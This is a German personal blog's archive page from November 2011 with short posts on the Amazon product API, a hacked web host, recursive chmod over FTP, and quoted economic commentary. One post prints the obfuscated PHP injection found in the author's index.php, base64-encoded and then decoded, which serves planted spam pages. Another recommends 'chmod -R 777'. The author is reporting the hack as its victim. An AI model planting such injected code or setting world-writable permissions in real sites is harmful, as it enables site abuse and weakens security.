Archiv November 2011

Sonntag, 13. November 2011

Der Associate Tag ist für die Amazon Product Advertisting-API nun zwingend

Seit einigen Jahren verwende ich eine selber geschriebene schicke kleine PHP-Klasse, um Produkte mit ihrer ISBN oder EAN aus dem Amazon-Katalog abzufragen. Seit einigen Wochen (oder sind es gar Monaten?) scheint der Zugriff nicht mehr zu funktionieren.

Ursache ist eine neue Bedingung von Seiten Amazons, die für jeden Request neu nicht nur den AWSAccessKeyId verlangt, sondern auch den AssociateTag.

Diesen erstellt man, in dem man sich einen Account unter affiliate-program.amazon.com einrichtet — wer Wert auf einen schönen und einfachen Tag legt, sollte sich beim Formularfeld für den Titel der Web-Site einen einprägsamen Namen einfallen lassen. Bei mir lautet der AssociateTag dementsprechend emeidicom-20.

Wird dieser zusätzliche Parameter mit Requests mitgeschickt, kriegt man keine Fehlermeldung mehr zu Gesicht, sondern die tatsächlich erwarteten Daten zu Büchern, Audio-CDs und DVDs.

Tags: , ,
Labels: Allgemein

1 Kommentar | neuen Kommentar verfassen

Sonntag, 13. November 2011

Genotec-Web-Server gehackt

Bei einer Routineüberprüfung meiner bei der Genotec AG gehosteten Web-Site eMeidi.com entdeckte ich soeben in der index.php in meinem Web-Root zuoberst folgenden kryptischen Eintrag:

<?php
error_reporting(0);
$gc0=base64_decode('ZG93bmxvYWRzL3dpbmRvd3MtcHJpY2VzLw==');
$fq1=$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];
$ti2=strpos($fq1,base64_decode('cD0='));

if($ti2===0){include($gc0.base64_decode('Pw==').$fq1);
exit;
}?>
<?php include(base64_decode('c2l0ZWluZGV4LnBocA=='));?>
...

Nach einer kurzen Analse der Base64-enkodierten Strings ging mir ein Lichtlein auf:

<?php
error_reporting(0);
$gc0='downloads/windows-prices/';
$fq1=$_SERVER['QUERY_STRING'];
$ti2=strpos($fq1,'p=');

if($ti2===0){include($gc0.'?'.$fq1);
exit;
}?>
<?php include('siteindex.php');?>
...

Dies erklärt mir endlich, wieso bei der Google-Suche nach eMeidi seit Monaten folgende komische Beschreibung zu meiner Web-Site angezeigt wird:

image-4825

Im Web-Root fanden sich folgende drei vom Hacker hinterlegte Dateien (ls -l unter Mac OS X, das Datum und die Dateigrössen stimmen mit dem Web-Server überein):

-rw-r--r--@ 1 mario  staff  23233  5 Jul  2010 login.php
-rw-r--r--@ 1 mario  staff  14028  5 Jul  2010 siteindex.php
-rw-r--r--@ 1 mario  staff  17986  5 Jul  2010 sitestatus.php

Zweck

(Vermutung) Das einschleusen von Seiteninhalten, um das Google-Ranking meiner Web-Site auszunutzen und unbedarfte Anwender auf Web-Sites zu locken, auf welchen Waren (wohl vornehmlich Raubkopien) angeboten werden — oder Kreditkartendaten abgegriffen werden.

/downloads/windows-prices/

Im besagten Verzeichnis /downloads/windows-prices/finden sich in ca. 10’000 Dateien über 190MB an Daten. Leider kann ich diese nicht löschen, weil sie dem www-Benutzer und nicht dem www4607 gehören. Ich gehe deshalb davon aus, dass nicht ein fehlerhaftes Script von mir für die Sicherheitslücke verantwortlich ist, sondern eine Sicherheitslücke in Apache:

Verzeichnis-Listing

Forensik

Wer mehr über die Technik hinter dem Hack erfahren will, lädt sich das mehr als 70MB umfassende Archiv aller suspekten Dateien herunter, welche ich vor der definitiven Löschung von meinem Server gesichert habe:

Archiv aller vom Hacker auf meinem Server abgelegten Dateien

Tags: , ,
Labels: Allgemein

5 Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Rekursives chmod von Dateien in einem Web-Verzeichnis mittels FTP-Kommandozeile

Weil der mit Mac OS X mitgelieferte Kommandozeilenclient ftp Dateiberechtigungen nicht rekursiv anpassen kann, wird lftp benötigt:

$ sudo port install lftp

Nach der Installation öffnet man folgendermassen die FTP-Verbindung zum betreffenden Server:

$ lftp
lftp :~> open emeidi.com
lftp emeidi.com:~> user benutzer passwort
lftp benutzer@emeidi.com:~> ls
...

Nachdem man sich in das entsprechende Verzeichnis durchgehangelt hat, reich ein

lftp benutzer@emeidi.com:~> chmod -R 777 .

aus, um die Anpassungen vorzunehmen. Da der entsprechende Ordner fast 10’000 Dateien enthielt, kam jedes GUI ins stottern — der Kommandozeilenclient verrichtete seine Arbeit wie erwartet rasch und ohne Komplikationen.

Tags: , ,
Labels: Linux

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Die US-Wirtschaft vollends im Casino-Modus

The US market, driven by short-term trading, has long since given up worrying about a sustainable recovery. It just wants some more short-term play money.

Quelle: The Dark Side of the Boom

Tags: ,
Labels: USA, Wirtschaft

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Das Ende der amerikanischen Konsumgesellschaft wurde vor 40 Jahren besiegelt

Starting in the late 1970s, the middle class began to weaken… The middle class nonetheless continued to spend, at first enabled by the flow of women into the work force. (In the 1960s only 12 percent of married women with young children were working for pay; by the late 1990s, 55 percent were.) When that way of life stopped generating enough income, Americans went deeper into debt. From the late 1990s to 2007, the typical household debt grew by a third. As long as housing values continued to rise it seemed a painless way to get additional money.

Quelle: A Zombie Economy Following Unfaithful Shepherds

Tags: ,
Labels: Gesellschaft, USA

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Brauchen wir ein Umdenken auf dem Arbeitsmarkt?

We’re living in an economy where productivity is no longer the goal, employment is.

Quelle: Are jobs obsolete?

Diese neue Denktradition zielt meiner Meinung nach in dieselbe Richtung wie Straubhaars „bedingungsloses Grundeinkommen“.

Tags:
Labels: Arbeit, Gesellschaft, Wirtschaft

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Wieso meine Mutter Angst vor dem Computer hat

This, in a nutshell, describes perfectly the way I see most non-technical folk relate to computers. They’ve just been hit so many times by software that makes no sense to them that they approach every task with fear and uncertainty—instead of making users more productive (and, therefore, happier), software makes them more depressed.

Quelle: Dashes, spaces, and incompetence

Tags: ,
Labels: Gesellschaft

Keine Kommentare | neuen Kommentar verfassen

Sonntag, 13. November 2011

Randal?

Their willingness to develop and ship gimmicks are their biggest advantage, because no matter how many people buy iPhones, there’s always going to be that one guy who thinks he needs the 3D camera kickstand projector phone with the shitty screen.

Quelle: Motorola’s Gimmicks

Tags: , ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen

Samstag, 12. November 2011

Softwareentwickler kriegen UI nicht gebacken — Apple hilft

Cocoa seems to be built on a simple premise: that developers know how to develop, but don’t know how to design interfaces; which, I am sorry to say, is probably not far off the mark

Quelle: Generations sideways

Tags: , ,
Labels: Apple

Keine Kommentare | neuen Kommentar verfassen

Samstag, 12. November 2011

USA: Militärisch-industrieller Komplex in seiner Reinform

On the other hand, the US is far more ambitious militarily. For every layabout chiseler the French supports, the US supports two soldiers and one Pentagon contractor. The cost is staggering …and probably even more irreducible than Europe’s social costs…

Quelle: Bernanke’s Plot to Overthrow the US Dollar

Tags: , , , ,
Labels: USA, Wirtschaft

Keine Kommentare | neuen Kommentar verfassen